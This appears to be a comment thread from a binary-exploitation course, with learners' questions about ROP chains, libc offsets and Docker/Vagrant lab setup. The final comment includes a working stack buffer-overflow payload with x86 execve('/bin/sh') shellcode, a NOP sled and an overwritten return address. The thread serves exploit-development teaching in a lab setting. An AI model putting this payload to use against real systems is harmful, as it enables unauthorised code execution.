Hi,

the bug which is responsible for the 'additional' gadget in the ropchain is fixed.
It would have been good if I had known this earlier ;)

So, if you want you can change your lessen6 script.

cheers

Please clarify how tou find system offset

This is not clear:
./dump local-03ffe08ba6d5e7f5b1d647f6a14e6837938e3bed | grep system

what is it?

Then the guide will be perfect :)

Hi,

I encountered an error like this when I'm setup environment.

Because https://apt.dockerproject.org/repo project shutted down. I fixed with this instructions https://docs.docker.com/engine/install/ubuntu/#install-using-the-repository.

Hello, nice course! Thanks!

But during my learning, it is quite strange that after running the vagrant ssh on my Mac, the default user is "vagrant" and the command prompt is vagrant@ubuntu-xenial:~$.
And by this user, the gdb doesn't load PEDA. I have to use sudo su - ubuntu to change user. Is there any configuration I forgot?

My environment is:

• MacOS High Sierra 10.13.4
• Vagrant 2.0.4 for Mac
• VirtualBox 5.2.0

Thanks!

I am following the course, and while writing exploits for lesson 9 and 10, I noticed that scripts working locally will fail on remote.

Trying to triage the problem, it seems that the installed docker runs a different libc version - libc6.2-27.so - while the vagrant vm is equipped with libc6.2-23.so, at least on my environment.

Can you reproduce this?

Hi,

I've just started the course and I'm really grateful to have found such a step by step resource.

In the the classic buffer overflow section, I'm not sure I understand why you put:
ret_address = 0xffffd5f0 + 28 + 4
in both examples.
I calculated the correct ret_address for my machine and it works fine but I had to remove
"+ 28 + 4" : the 28 bytes junk is added later and the 4 bytes is the ret address itself

ret_address = 0xffffd5b0
shellcode = ("\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" +
             "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" +
             "\x80\xe8\xdc\xff\xff\xff/bin/sh")
payload = "A"*28 + p32(ret_address)
padding_len = 100 - len(payload) - len(shellcode)
payload += "\x90" * padding_len + shellcode

Thank you